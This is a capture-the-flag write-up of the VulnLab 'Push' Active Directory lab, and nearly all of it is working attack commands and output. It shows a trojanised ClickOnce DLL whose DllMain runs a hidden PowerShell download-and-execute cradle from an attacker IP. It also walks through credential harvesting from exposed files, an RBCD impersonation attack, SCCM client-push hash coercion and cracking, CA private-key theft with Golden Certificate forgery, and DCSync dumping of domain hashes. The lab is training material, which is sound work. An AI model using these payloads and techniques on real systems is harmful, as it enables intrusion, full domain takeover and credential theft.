VulnLab Push
VulnLab Push
VulnLab Push
Push
Recon
1
2
3
4
└─$ rustscan -g -a 10.10.238.133,10.10.238.134 -r 1-65535
10.10.238.133 -> [53,88,135,139,389,445,464,593,636,3389,49664,49667]
10.10.238.134 -> [21,80,135,139,445,3389,5985,47001,49664,49665,49666,49668,49667,49669,49670,49672,49671]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3389,49664,49667 10.10.238.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 20:45 +05
Nmap scan report for 10.10.238.133
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-20 15:43:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: push.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.push.vl
| Subject Alternative Name: DNS:DC01.push.vl
| Not valid before: 2023-08-29T21:18:39
|_Not valid after: 2123-08-06T21:18:39
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: push.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.push.vl
| Subject Alternative Name: DNS:DC01.push.vl
| Not valid before: 2023-08-29T21:18:39
|_Not valid after: 2123-08-06T21:18:39
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-20T15:45:19+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=DC01.push.vl
| Not valid before: 2025-01-19T15:40:54
|_Not valid after: 2025-07-21T15:40:54
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: DC01.push.vl
| DNS_Tree_Name: push.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-20T15:44:40+00:00
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-20T15:44:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.93 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
─$ nmap -sC -sV -p21,80,135,139,445,3389,5985,47001,49664,49665,49666,49668,49667,49669,49670,49672,49671 10.10.238.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 20:45 +05
Nmap scan report for 10.10.238.134
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-03-23 08:49PM <DIR> .config
| 08-03-23 08:49PM <DIR> .git
|_08-03-23 08:49PM <DIR> dev
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: SelfService
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MS01.push.vl
| Not valid before: 2025-01-19T15:40:01
|_Not valid after: 2025-07-21T15:40:01
| rdp-ntlm-info:
| Target_Name: PUSH
| NetBIOS_Domain_Name: PUSH
| NetBIOS_Computer_Name: MS01
| DNS_Domain_Name: push.vl
| DNS_Computer_Name: MS01.push.vl
| DNS_Tree_Name: push.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-01-20T15:45:03+00:00
|_ssl-date: 2025-01-20T15:45:10+00:00; -1m21s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-20T15:45:04
|_ start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.01 seconds
MS01.push.vl
1
2
3
4
5
6
└─$ nxc smb targets.txt -u Guest -p '' --shares
SMB 10.10.238.134 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB 10.10.238.133 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB 10.10.238.134 445 MS01 [-] push.vl\Guest: STATUS_ACCOUNT_DISABLED
SMB 10.10.238.133 445 DC01 [-] push.vl\Guest: STATUS_ACCOUNT_DISABLED
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Anonymous login to ftp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└─$ ftp anonymous@10.10.238.134
Connected to 10.10.238.134.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -lha
229 Entering Extended Passive Mode (|||59438|)
125 Data connection already open; Transfer starting.
08-03-23 08:49PM <DIR> .config
08-03-23 08:49PM <DIR> .git
08-03-23 08:49PM 44 .git-credentials
08-03-23 08:49PM <DIR> dev
226 Transfer complete.
ftp> get .git-credentials
local: .git-credentials remote: .git-credentials
229 Entering Extended Passive Mode (|||59448|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************************************************************************************************************************| 44 0.36 KiB/s 00:00 ETA
226 Transfer complete.
44 bytes received in 00:00 (0.36 KiB/s)
ftp>
It contains credentials
1
2
└─$ cat .git-credentials
https://olivia.wood:DeployTrust07@github.com
We also have SelfService app running on MS01, which seems like ClickOnce
We can test credentials we found and check the shares. Looks like credentials are valid. We have READ,WRITE on wwwroot on MS01. Also, it looks like there’s SCCM service running on DC01
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
└─$ nxc smb targets.txt -u olivia.wood -p 'DeployTrust07' --shares
SMB 10.10.238.134 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB 10.10.238.133 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB 10.10.238.134 445 MS01 [+] push.vl\olivia.wood:DeployTrust07
SMB 10.10.238.133 445 DC01 [+] push.vl\olivia.wood:DeployTrust07
SMB 10.10.238.134 445 MS01 [*] Enumerated shares
SMB 10.10.238.134 445 MS01 Share Permissions Remark
SMB 10.10.238.134 445 MS01 ----- ----------- ------
SMB 10.10.238.134 445 MS01 ADMIN$ Remote Admin
SMB 10.10.238.134 445 MS01 C$ Default share
SMB 10.10.238.134 445 MS01 IPC$ READ Remote IPC
SMB 10.10.238.134 445 MS01 wwwroot READ,WRITE clickonce application dev share
SMB 10.10.238.133 445 DC01 [*] Enumerated shares
SMB 10.10.238.133 445 DC01 Share Permissions Remark
SMB 10.10.238.133 445 DC01 ----- ----------- ------
SMB 10.10.238.133 445 DC01 ADMIN$ Remote Admin
SMB 10.10.238.133 445 DC01 AdminUIContentPayload AdminUIContentPayload share for AdminUIContent Packages
SMB 10.10.238.133 445 DC01 C$ Default share
SMB 10.10.238.133 445 DC01 EasySetupPayload EasySetupPayload share for EasySetup Packages
SMB 10.10.238.133 445 DC01 IPC$ READ Remote IPC
SMB 10.10.238.133 445 DC01 NETLOGON READ Logon server share
SMB 10.10.238.133 445 DC01 SCCMContentLib$ READ 'Configuration Manager' Content Library for site HQ0 (8/30/2023)
SMB 10.10.238.133 445 DC01 SMSPKGC$ READ SMS Site HQ0 DP 8/31/2023
SMB 10.10.238.133 445 DC01 SMSSIG$ READ SMS Site HQ0 DP 8/31/2023
SMB 10.10.238.133 445 DC01 SMS_CPSC$ SMS Compressed Package Storage
SMB 10.10.238.133 445 DC01 SMS_DP$ ConfigMgr Site Server DP share
SMB 10.10.238.133 445 DC01 SMS_HQ0 SMS Site HQ0 08/30/23
SMB 10.10.238.133 445 DC01 SMS_OCM_DATACACHE OCM inbox directory
SMB 10.10.238.133 445 DC01 SMS_SITE SMS Site HQ0 08/30/23
SMB 10.10.238.133 445 DC01 SMS_SUIAgent SMS Software Update Installation Agent -- 08/30/23
SMB 10.10.238.133 445 DC01 SYSVOL READ Logon server share
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Let’s also capture domain information
1
2
3
└─$ bloodhound-python -d 'push.vl' -u 'olivia.wood' -p 'DeployTrust07' -c all -ns 10.10.238.133 --zip
INFO: Found AD domain: push.vl
<SNIP>
Nothing interesting except for the fact that MS01$ is a member of Cert Publishers group
Let’s enumerate ADCS too
1
2
3
└─$ certipy find -u olivia.wood@push.vl -p 'DeployTrust07' -dc-ip 10.10.238.133 -old-bloodhound
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
The wiki mentions ClickOnce backdoor. First, we download all files from wwwroot share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ tree -L3
.
├── Application Files
│ └── SelfService_1_0_0_5
│ ├── Launcher.exe.deploy
│ ├── SelfService.deps.json.deploy
│ ├── SelfService.dll.deploy
│ ├── SelfService.dll.manifest
│ ├── SelfService.exe.deploy
│ ├── SelfService.runtimeconfig.json.deploy
│ ├── System.DirectoryServices.AccountManagement.dll.deploy
│ └── System.DirectoryServices.Protocols.dll.deploy
├── index.html
├── last-run.txt
├── SelfService.application
└── setup.exe
According to the blog we can replace the dll to perform dll hijacking. But we also have to:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.4.147/shell.txt')");
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
Compile dll
1
└─$ x86_64-w64-mingw32-gcc ./SerfService.c -shared -o SelfService.dll.deploy
Now we need to generate sha256 hash and base64 encode it
1
2
3
└─$ openssl dgst -binary -sha256 SelfService.dll.deploy | openssl enc -base64
waoA0EfWDsIh6LYt4kEgAzJ6psi59erK5Gtb85CYVGM=
We also need file size
1
2
3
4
└─$ ls -l
total 472
-rwxrwxr-x 1 kali kali 86510 Jan 21 21:17 SelfService.dll.deploy
-rw-rw-r-- 1 kali kali 491 Jan 21 21:16 SerfService.c
We need to add those values to SelfService.dll.manifest
We also have to remove Signature and publisherIdentity at the end and zero out publicKeyToken
Since we modified SelfService.dll.manifest, we have to generate new hash and base64 encode it
1
2
3
└─$ openssl dgst -binary -sha256 SelfService.dll.manifest | openssl enc -base64
8vu4ByRHPuzPBx5y5dhfEIg8zaZxmaTKDtPRplAoKV0=
Now update SelfService.application by adding encoded hash and zero out publicKeyToken
Now, we can upload them
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
└─$ smbclient.py push.vl/olivia.wood:'DeployTrust07'@10.10.147.246
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
IPC$
wwwroot
# use wwwroot
# ls
drw-rw-rw- 0 Fri Sep 1 01:17:34 2023 .
drw-rw-rw- 0 Thu Aug 31 23:27:01 2023 ..
drw-rw-rw- 0 Sat Sep 2 16:35:25 2023 Application Files
-rw-rw-rw- 7634 Fri Sep 1 01:14:32 2023 index.html
-rw-rw-rw- 26 Tue Jan 21 21:32:41 2025 last-run.txt
-rw-rw-rw- 15826 Sat Sep 2 17:22:48 2023 SelfService.application
-rw-rw-rw- 697184 Fri Sep 1 01:14:18 2023 setup.exe
# cd Application Files
# ls
drw-rw-rw- 0 Sat Sep 2 16:35:25 2023 .
drw-rw-rw- 0 Fri Sep 1 01:17:34 2023 ..
drw-rw-rw- 0 Fri Sep 1 01:14:24 2023 SelfService_1_0_0_5
# cd SelfService_1_0_0_5
# ls
drw-rw-rw- 0 Fri Sep 1 01:14:24 2023 .
drw-rw-rw- 0 Sat Sep 2 16:35:25 2023 ..
-rw-rw-rw- 23904 Fri Sep 1 01:14:19 2023 Launcher.exe.deploy
-rw-rw-rw- 5891 Fri Sep 1 01:14:19 2023 SelfService.deps.json.deploy
-rw-rw-rw- 17760 Fri Sep 1 01:14:19 2023 SelfService.dll.deploy
-rw-rw-rw- 19133 Fri Sep 1 01:14:19 2023 SelfService.dll.manifest
-rw-rw-rw- 161632 Fri Sep 1 01:14:19 2023 SelfService.exe.deploy
-rw-rw-rw- 372 Fri Sep 1 01:14:19 2023 SelfService.runtimeconfig.json.deploy
-rw-rw-rw- 283264 Fri Sep 1 01:14:19 2023 System.DirectoryServices.AccountManagement.dll.deploy
-rw-rw-rw- 157312 Fri Sep 1 01:14:19 2023 System.DirectoryServices.Protocols.dll.deploy
# put SelfService.dll.deploy
# put SelfService.dll.manifest
# cd ..
# cd ..
# put SelfService.application
After few minutes we get connection
We have no interesting privileges, but we find another creds inside home directory https://kelly.hill:<REDACTED>@github.com
We can see that new creds give us possibility to perform RBCD attack on MS01. We can also exploit SCCM
RBCD
First check if we can create fake computer
1
2
3
4
5
└─$ nxc ldap 10.10.147.245 -u 'kelly.hill' -p '<REDACTED>' -M maq
LDAP 10.10.147.245 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:push.vl)
LDAP 10.10.147.245 389 DC01 [+] push.vl\kelly.hill:<REDACTED>
MAQ 10.10.147.245 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.147.245 389 DC01 MachineAccountQuota: 10
We can, so let’s continue attack. Add fake computer
1
2
3
4
└─$ addcomputer.py -computer-name 'PWNED$' -computer-pass 'ComputerPass123' -dc-ip 10.10.147.245 'push.vl/kelly.hill':'<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account PWNED$ with password ComputerPass123.
Add delegation
1
2
3
4
5
6
7
8
└─$ rbcd.py -delegate-from 'PWNED$' -delegate-to 'MS01$' -action 'write' -dc-ip 10.10.147.245 'push.vl/kelly.hill:<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] PWNED$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] PWNED$ (S-1-5-21-1451457175-172047642-1427519037-3602)
Request ticket and impersonate administrator
1
2
3
4
5
6
7
8
9
10
└─$ getST.py -spn 'cifs/ms01.push.vl' -impersonate 'administrator' -dc-ip 10.10.147.245 'push.vl/PWNED$:ComputerPass123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
Dump secrets
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache secretsdump.py -k -no-pass ms01.push.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] DefaultPassword
PUSH\kelly.hill:<REDACTED>
<SNIP>
SCCM
We saw that SCCM is installed, but we can really gather credentials locally since they require administrative privileges.
But we can try coercing SCCM to capture credentials via Client Push Installation. Deploy responder and invoke client push
1
2
3
4
5
6
7
8
9
10
11
12
C:\temp>.\SharpSCCM.exe invoke client-push -t 10.8.4.147
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: DC01.push.vl
[+] Site code: HQ0
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
We should receive connection to our Responder as scccadmin, save hash and crack it
1
2
3
4
5
└─$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
SCCADMIN::PUSH:39760917d5bba31e:341deed496ecc82784f8f9d12902a126:010100000000000080781374c1ddd901adbcd4a49246636300000000020008003800420057004b0001001e00570049004e002d0034004d0043004f0059004400530042005a003200450004003400570049004e002d0034004d0043004f0059004400530042005a00320045002e003800420057004b002e004c004f00430041004c00030014003800420057004b002e004c004f00430041004c00050014003800420057004b002e004c004f00430041004c000700080080781374c1ddd901060004000200000008003000300000000000000000000000004000001fd54bfaacf6ff7dfb8d076ecd85f9a6809938375c1d9ffc56a504b12a3df87f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0030002e003100310036000000000000000000:<REDACTED>
<SNIP>
And creds are valid
1
2
3
4
└─$ nxc smb 10.10.147.246 -u sccadmin -p '<REDACTED>'
SMB 10.10.147.246 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB 10.10.147.246 445 MS01 [+] push.vl\sccadmin:<REDACTED> (Pwn3d!)
DC01.push.vl
We know that MS01 is CA
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Certificate Authorities
0
CA Name : CA
DNS Name : MS01.push.vl
Certificate Subject : CN=CA, DC=push, DC=vl
Certificate Serial Number : 7D851B627A9199A2436DC9AB88385372
Certificate Validity Start : 2023-08-31 07:25:21+00:00
Certificate Validity End : 3022-08-31 07:35:21+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : PUSH.VL\Administrators
Access Rights
ManageCertificates : PUSH.VL\Administrators
PUSH.VL\Domain Admins
PUSH.VL\Enterprise Admins
ManageCa : PUSH.VL\Administrators
PUSH.VL\Domain Admins
PUSH.VL\Enterprise Admins
Enroll : PUSH.VL\Authenticated Users
We can now perform Golden Certificate attack.
First, extract the DPAPI-protected CA cert private key
1
2
3
4
5
6
7
8
9
10
└─$ certipy ca -backup -ca 'CA' -u 'sccadmin@push.vl' -p '<REDACTED>' -target-ip 10.10.147.246
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
Then forge ticket to Domain Administrator
1
2
3
4
└─$ certipy forge -ca-pfx 'CA.pfx' -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
If we try to retrieve hash using certipy and pfx, we get error: KDC_ERROR_CLIENT_NOT_TRUSTED since DC does not support the PKINIT. Check this article
1
2
3
4
5
6
└─$ certipy auth -pfx administrator_forged.pfx -username administrator -domain push.vl -dc-ip 10.10.147.245
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@push.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
We can still try to abuse this using passthecert.py. We can perform one of these things:
- Add our created machine account to DC’s msDS-AllowedToActOnBehalfOfOtherIdentity property to perform resource based delegation RCBD
- Modify account’s password
- Granting the low privileged user DCSync rights
We will grant sccadmin dcsync rights
1
2
3
4
5
└─$ python3 ~/tools/red-team/PKINITtools/passthecert.py -action modify_user -crt admin.crt -key admin.key -domain push.vl -dc-ip 10.10.147.245 -target sccadmin -elevate
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Granted user 'sccadmin' DCSYNC rights!
Now we can perform DCSync
1
2
3
4
5
6
7
8
└─$ secretsdump.py push.vl/sccadmin:'<REDACTED>'@10.10.147.245
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
https://api.vulnlab.com/api/v1/share?id=5a3df241-63f3-4174-92e6-9ed291c49e17
This post is licensed under CC BY 4.0 by the author.